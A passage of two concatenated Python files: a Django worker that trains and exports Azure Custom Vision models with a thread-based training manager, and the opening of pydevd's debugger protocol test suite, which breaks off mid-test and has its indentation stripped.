project_obj = Project.objects.get(pk=project_id)
logger.info("Project id: %s", project_obj.id)
if project_obj.is_demo:
logger.info("Demo project is already trained")
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_0_OK,
)
return
if project_obj.is_prediction_module:
logger.info("Prediction Module need no train.")
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_0_OK,
)
return
# =====================================================
# 0. Get Project in Django ===
# =====================================================
if not project_obj.setting or not project_obj.setting.is_trainer_valid:
upcreate_training_status(
project_id=project_obj.id, status="Failed", log="Custom Vision Access Error"
)
return
# =====================================================
# 1. Prepare Custom Vision Client ===
# =====================================================
trainer = project_obj.setting.get_trainer_obj()
customvision_project_id = project_obj.customvision_id
project_obj.dequeue_iterations()
part_ids = [part.id for part in Part.objects.filter(project=project_obj)]
logger.info("Part ids: %s", part_ids)
# =====================================================
# 2. Get/Create Project on Custom Vision ===
# =====================================================
try:
trainer.get_project(customvision_project_id)
upcreate_training_status(
project_id=project_obj.id,
status="preparing",
log=(f"Project {project_obj.name} " + "found on Custom Vision"),
)
except Exception:
project_obj.create_project()
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_2_PROJECT_CREATED,
)
project_obj = Project.objects.get(pk=project_id)
logger.info("Project created on Custom Vision.")
logger.info("Project Id: %s", project_obj.customvision_id)
logger.info("Project Name: %s", project_obj.name)
# =====================================================
# 3. Upload parts ===
# =====================================================
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_3_UPLOADING_PARTS,
)
# Get tags_dict to avoid getting tags every time
tags = trainer.get_tags(project_id=project_obj.customvision_id)
tags_dict = {tag.name: tag.id for tag in tags}
# App Insight
project_changed = False
has_new_parts = False
has_new_images = False
parts_last_train = len(tags)
images_last_train = trainer.get_tagged_image_count(project_obj.customvision_id)
# Create/update tags on Custom Vision Project
has_new_parts = batch_upload_parts_to_customvision(
project_id=project_id, part_ids=part_ids, tags_dict=tags_dict
)
if has_new_parts:
project_changed = True
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_4_UPLOADING_IMAGES,
)
# =====================================================
# 4. Upload images to Custom Vision Project ===
# =====================================================
for part_id in part_ids:
logger.info("Uploading images with part_id %s", part_id)
has_new_images = upload_images_to_customvision_helper(
project_id=project_obj.id, part_id=part_id
)
if has_new_images:
project_changed = True
# =====================================================
# 5. Submit Training Task to Custom Vision ===
# =====================================================
logger.info("Submit Training Task")
if not project_changed:
logger.info("Project not changed. Not Training!")
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_10_NO_CHANGE,
)
return
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_5_SUBMITTING_TRAINING_TASK,
)
training_task_submit_success = project_obj.train_project()
# App Insight
if training_task_submit_success:
update_app_insight_counter(
project_obj=project_obj,
has_new_parts=has_new_parts,
has_new_images=has_new_images,
parts_last_train=parts_last_train,
images_last_train=images_last_train,
)
# =====================================================
# 6. Training (Finding Iteration) ===
# =====================================================
logger.info("Finding Iteration")
customvision_id = project_obj.customvision_id
wait_prepare = 0
max_wait_prepare = 60
status_init = False
while True:
time.sleep(1)
wait_prepare += 1
iterations = trainer.get_iterations(customvision_id)
if not status_init:
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_6_PREPARING_CUSTOM_VISION_ENV,
)
status_init = True
if len(iterations) > 0:
logger.info("Iteration Found %s", iterations[0])
break
if wait_prepare > max_wait_prepare:
logger.info("Something went wrong...")
upcreate_training_status(
project_id=project_obj.id,
status="Failed",
log="Get iteration from Custom Vision occurs error.",
need_to_send_notification=True,
)
break
# =====================================================
# 6. Training (Waiting) ===
# =====================================================
logger.info("Training")
status_init = False
while True:
time.sleep(1)
iterations = trainer.get_iterations(customvision_id)
iteration = iterations[0]
if not status_init:
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_7_TRAINING,
)
status_init = True
if iteration.exportable and iteration.status == "Completed":
break
logger.info("Still training...")
# =====================================================
# 7. Exporting ===
# =====================================================
status_init = False
while True:
time.sleep(1)
if not status_init:
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_8_EXPORTING,
)
status_init = True
try:
project_obj.export_iteration(iteration.id)
except Exception:
logger.exception("Export already in queue")
try:
project_obj.export_iteration(iteration.id, flavor="ONNXFloat16")
except Exception:
logger.exception("Export already in queue")
try:
project_obj.export_iteration(iteration.id, platform="OPENVINO")
except Exception:
logger.exception("Export already in queue")
try:
exports = project_obj.get_exports(iteration.id)
except Exception:
logger.exception("get_exports exception")
continue
if (
len(exports) < 2
or not exports[0].download_uri
or not exports[1].download_uri
):
logger.info("Status: exporting model")
continue
break
# =====================================================
# 8. Saving model and performance ===
# =====================================================
logger.info("Successfully export model: %s", project_obj.download_uri)
logger.info("Training about to completed.")
exports = trainer.get_exports(customvision_id, iteration.id)
for export in exports:
if export.flavor:
project_obj.download_uri_fp16 = export.download_uri
else:
if "onnx" in export.platform.lower():
project_obj.download_uri = export.download_uri
else:
project_obj.download_uri_openvino = export.download_uri
# if not exports[0].flavor:
# project_obj.download_uri = exports[0].download_uri
# project_obj.download_uri_fp16 = exports[1].download_uri
# else:
# project_obj.download_uri = exports[1].download_uri
# project_obj.download_uri_fp16 = exports[0].download_uri
train_performance_list = []
for iteration in iterations[:2]:
train_performance_list.append(
trainer.get_iteration_performance(customvision_id, iteration.id).as_dict()
)
upcreate_training_status(
project_id=project_obj.id,
performance=json.dumps(train_performance_list),
need_to_send_notification=True,
**progress.PROGRESS_9_SUCCESS,
)
logger.info("Training Performance: %s", train_performance_list)
# =====================================================
# 0. End ===
# =====================================================
if has_new_parts:
logger.info("This is a training job")
project_obj.training_counter += 1
elif has_new_images:
logger.info("This is a re-training job")
project_obj.retraining_counter += 1
project_obj.save()
def train_project_catcher(project_id):
"""train_project_catcher.
Dummy exception handler.
Args:
project_id:
"""
try:
train_project_worker(project_id=project_id)
except Exception:
upcreate_training_status(
project_id=project_id,
status="Failed",
log=traceback.format_exc(),
need_to_send_notification=True,
)
class TrainingManager:
"""TrainingManager."""
def __init__(self):
"""__init__."""
self.training_tasks = {}
self.mutex = threading.Lock()
self.garbage_collector()
def add(self, project_id):
"""add.
Add a project in training tasks.
"""
if project_id in self.training_tasks:
raise ProjectAlreadyTraining
self.mutex.acquire()
task = TrainingTask(project_id=project_id)
self.training_tasks[project_id] = task
task.start()
self.mutex.release()
def get_task_by_id(self, project_id):
"""get_task_by_id."""
self.mutex.acquire()
if project_id in self.training_tasks:
return self.training_tasks["project_id"]
self.mutex.release()
return None
def garbage_collector(self):
"""garbage_collector.
IMPORTANT, autoreloader will not reload threading,
please restart the server if you modify the thread.
"""
def _gc(self):
while True:
self.mutex.acquire()
if PRINT_THREAD:
logger.info("tasks: %s", self.training_tasks)
to_delete = []
for project_id in self.training_tasks:
if not self.training_tasks[project_id].worker.is_alive():
logger.info("Project %s Training Task is finished", project_id)
to_delete.append(project_id)
for project_id in to_delete:
del self.training_tasks[project_id]
self.mutex.release()
time.sleep(3)
threading.Thread(target=_gc, args=(self,), daemon=True).start()
class TrainingTask:
"""TrainingTask."""
def __init__(self, project_id):
"""__init__.
Args:
project_id: Django ORM
"""
self.project_id = project_id
self.status = "init"
self.worker = None
def start(self):
"""start."""
self.status = "running"
self.worker = threading.Thread(
target=train_project_catcher,
name=f"train_project_worker_{self.project_id}",
kwargs={"project_id": self.project_id},
daemon=True,
)
self.worker.start()
def __str__(self):
return "<Training Task " + str(self.project_id) + ">"
def __repr__(self):
return "<Training Task " + str(self.project_id) + ">"
if "runserver" in sys.argv:
TRAINING_MANAGER = TrainingManager()
else:
TRAINING_MANAGER = None
|
test_debugger.py
|
# coding: utf-8
'''
The idea is that we record the commands sent to the debugger and reproduce them from this script
(so, this works as the client, which spawns the debugger as a separate process and communicates
to it as if it was run from the outside)
Note that it's a python script but it'll spawn a process to run as jython, ironpython and as python.
'''
import time
import pytest
from tests_python import debugger_unittest
from tests_python.debugger_unittest import (CMD_SET_PROPERTY_TRACE, REASON_CAUGHT_EXCEPTION,
REASON_UNCAUGHT_EXCEPTION, REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND, overrides, CMD_THREAD_CREATE,
CMD_GET_THREAD_STACK, REASON_STEP_INTO_MY_CODE, CMD_GET_EXCEPTION_DETAILS, IS_IRONPYTHON, IS_JYTHON, IS_CPYTHON,
IS_APPVEYOR, wait_for_condition, CMD_GET_FRAME, CMD_GET_BREAKPOINT_EXCEPTION,
CMD_THREAD_SUSPEND, CMD_STEP_OVER, REASON_STEP_OVER, CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION,
CMD_THREAD_RESUME_SINGLE_NOTIFICATION, REASON_STEP_RETURN, REASON_STEP_RETURN_MY_CODE,
REASON_STEP_OVER_MY_CODE, REASON_STEP_INTO, CMD_THREAD_KILL, IS_PYPY)
from _pydevd_bundle.pydevd_constants import IS_WINDOWS
from _pydevd_bundle.pydevd_comm_constants import CMD_RELOAD_CODE
import json
import pydevd_file_utils
import subprocess
import threading
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from tests_python.debug_constants import * # noqa
pytest_plugins = [
str('tests_python.debugger_fixtures'),
]
try:
xrange
except:
xrange = range
if IS_PY2:
builtin_qualifier = "__builtin__"
else:
builtin_qualifier = "builtins"
@pytest.mark.skipif(not IS_CPYTHON, reason='Test needs gc.get_referrers/reference counting to really check anything.')
def test_case_referrers(case_setup):
with case_setup.test_file('_debugger_case1.py') as writer:
writer.log.append('writing add breakpoint')
writer.write_add_breakpoint(6, 'set_up')
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('step over')
writer.write_step_over(thread_id)
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.log.append('asserting')
try:
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_case_2(case_setup):
with case_setup.test_file('_debugger_case2.py') as writer:
writer.write_add_breakpoint(3, 'Call4') # seq = 3
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_add_breakpoint(14, 'Call2')
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.parametrize(
'skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception',
(
[['NameError'], []],
[['NameError'], ['NameError']],
[[], []], # Empty means it'll suspend/print in any exception
[[], ['NameError']],
[['ValueError'], ['Exception']],
[['Exception'], ['ValueError']], # ValueError will also suspend/print since we're dealing with a NameError
)
)
def test_case_breakpoint_condition_exc(case_setup, skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception):
msgs_in_stderr = (
'Error while evaluating expression: i > 5',
'Traceback (most recent call last):',
'File "<string>", line 1, in <module>',
)
# It could be one or the other in PyPy depending on the version.
msgs_one_in_stderr = (
"NameError: name 'i' is not defined",
"global name 'i' is not defined",
)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
for msg in msgs_in_stderr + msgs_one_in_stderr:
if msg in line:
return True
return False
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if skip_print_breakpoint_exception in ([], ['ValueError']):
for msg in msgs_in_stderr:
assert msg in stderr
for msg in msgs_one_in_stderr:
if msg in stderr:
break
else:
raise AssertionError('Did not find any of: %s in stderr: %s' % (
msgs_one_in_stderr, stderr))
else:
for msg in msgs_in_stderr + msgs_one_in_stderr:
assert msg not in stderr
with case_setup.test_file('_debugger_case_breakpoint_condition_exc.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
original_additional_output_checks = writer.additional_output_checks
writer.additional_output_checks = additional_output_checks
writer.write_suspend_on_breakpoint_exception(skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception)
breakpoint_id = writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'Call', condition='i > 5')
writer.write_make_initial_run()
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
if IS_JYTHON:
# Jython will break twice.
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
msg = writer.wait_for_message(CMD_GET_FRAME)
name_to_value = {}
for var in msg.var:
name_to_value[var['name']] = var['value']
assert name_to_value == {'i': 'int: 6', 'last_i': 'int: 6'}
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_double_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_remove_breakpoint(breakpoint_id) # Double-remove (just check that we don't have an error).
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test fails once in a while due to timing issues on IronPython, so, skipping it.')
def test_case_3(case_setup):
with case_setup.test_file('_debugger_case3.py') as writer:
writer.write_make_initial_run()
time.sleep(.5)
breakpoint_id = writer.write_add_breakpoint(4, '')
writer.write_add_breakpoint(5, 'FuncNotAvailable') # Check that it doesn't get hit in the global when a function is available
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_suspend_thread(case_setup):
with case_setup.test_file('_debugger_case4.py') as writer:
writer.write_make_initial_run()
thread_id = writer.wait_for_new_thread()
writer.write_suspend_thread(thread_id)
while True:
hit = writer.wait_for_breakpoint_hit((REASON_THREAD_SUSPEND, REASON_STOP_ON_BREAKPOINT))
if hit.name == 'sleep':
break # Ok, broke on 'sleep'.
else:
# i.e.: if it doesn't hit on 'sleep', release and pause again.
writer.write_run_thread(thread_id)
time.sleep(.1)
writer.write_suspend_thread(thread_id)
assert hit.thread_id == thread_id
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'exit_while_loop()')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop()" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier),
'<var name="exit_while_loop()" type="str" value="str: ok"', # jython
]
])
writer.write_run_thread(thread_id)
writer.finished_ok = True
# Jython has a weird behavior: it seems it has fine-grained locking so that when
# we're inside the tracing other threads don't run (so, we can have only one
# thread paused in the debugger).
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
def test_case_suspend_all_thread(case_setup):
with case_setup.test_file('_debugger_case_suspend_all.py') as writer:
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread() # Main thread
thread_id1 = writer.wait_for_new_thread() # Thread 1
thread_id2 = writer.wait_for_new_thread() # Thread 2
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
# Wait for 2 threads to be suspended (the main thread is already in a join, so, it can't actually
# break out of it while others don't proceed).
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit0.thread_id, hit0.frame_id, 'LOCAL'), 'exit_while_loop(1)')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop(1)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier)
]
])
writer.write_evaluate_expression('%s\t%s\t%s' % (hit1.thread_id, hit1.frame_id, 'LOCAL'), 'exit_while_loop(2)')
writer.wait_for_evaluation('<var name="exit_while_loop(2)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def test_case_5(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
breakpoint_id = writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_6(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
assert 13 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test is flaky on Jython, so, skipping it.')
def test_case_7(case_setup):
# This test checks that we start without variables and at each step a new var is created, but on ironpython,
# the variables exist all at once (with None values), so, we can't test it properly.
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars('<xml></xml>') # no vars at this point
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int', # jython
]
])
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" qualifier="{0}" value="int%253A 20" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" value="int%253A 20" />%0A', # jython
]
])
writer.write_run_thread(hit.thread_id)
assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_8(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=15)
writer.write_run_thread(hit.thread_id)
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_9(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
# Note: no active exception (should not give an error and should return no
# exception details as there's no exception).
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(CMD_GET_EXCEPTION_DETAILS)
assert msg.thread['id'] == hit.thread_id
assert not hasattr(msg.thread, 'frames') # No frames should be found.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_10(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'None') # None or Method should make hit.
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 11 == writer._sequence, 'Expected 11. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_11(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'Method1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=2)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=3)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO, line=12) # Reverts to step in
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=13)
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO, line=18) # Reverts to step in
assert hit.name == '<module>'
# Finish with a step over
writer.write_step_over(hit.thread_id)
if IS_JYTHON:
# Jython got to the exit functions (CPython does it builtin,
# so we have no traces from Python).
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO) # Reverts to step in
assert hit.name == '_run_exitfuncs'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_12(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, '') # Should not be hit: setting empty function (not None) should only hit global.
writer.write_add_breakpoint(6, 'Method1a')
writer.write_add_breakpoint(11, 'Method2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=11)
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=6) # not a return (it stopped in the other breakpoint)
writer.write_run_thread(hit.thread_id)
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='Failing on IronPython (needs to be investigated).')
def test_case_13(case_setup):
with case_setup.test_file('_debugger_case13.py') as writer:
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydevd_bundle' not found while handling absolute import",
"import __builtin__"):
if expected in line:
return True
return False
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(35, 'main')
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=25)
# Should go inside setter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=21)
# Should go inside getter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
# Disable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;true;true;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=39)
# Should Skip step into properties setter
# Enable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=8)
# Should go inside getter method
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_14(case_setup):
# Interactive Debug Console
with case_setup.test_file('_debugger_case14.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.thread_id, '%s not valid.' % hit.thread_id
assert hit.frame_id, '%s not valid.' % hit.frame_id
# Access some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Black%27'])
assert 7 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
# Change some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color='Red'" % (hit.thread_id, hit.frame_id))
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Red%27'])
assert 11 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
# Iterate some loop
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tfor i in range(3):" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t print(i)" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(
[
'<xml><more>False</more><output message="0"></output><output message="1"></output><output message="2"></output></xml>' ]
)
assert 17 == writer._sequence, 'Expected 19. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_15(case_setup):
with case_setup.test_file('_debugger_case15.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# Access some variable
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXEC", "f=lambda x: 'val=%s' % x", "f")
writer.wait_for_custom_operation('val=Black')
assert 7 == writer._sequence, 'Expected 7. Had: %s' % writer._sequence
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXECFILE", debugger_unittest._get_debugger_test_file('_debugger_case15_execfile.py'), "f")
writer.wait_for_custom_operation('val=Black')
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_16(case_setup):
# numpy.ndarray resolver
try:
import numpy
except ImportError:
pytest.skip('numpy not available')
with case_setup.test_file('_debugger_case16.py') as writer:
writer.write_add_breakpoint(9, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# In this test we check that the three arrays of different shapes, sizes and types
# are all resolved properly as ndarrays.
# First pass check is that we have all three expected variables defined
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_multiple_vars((
(
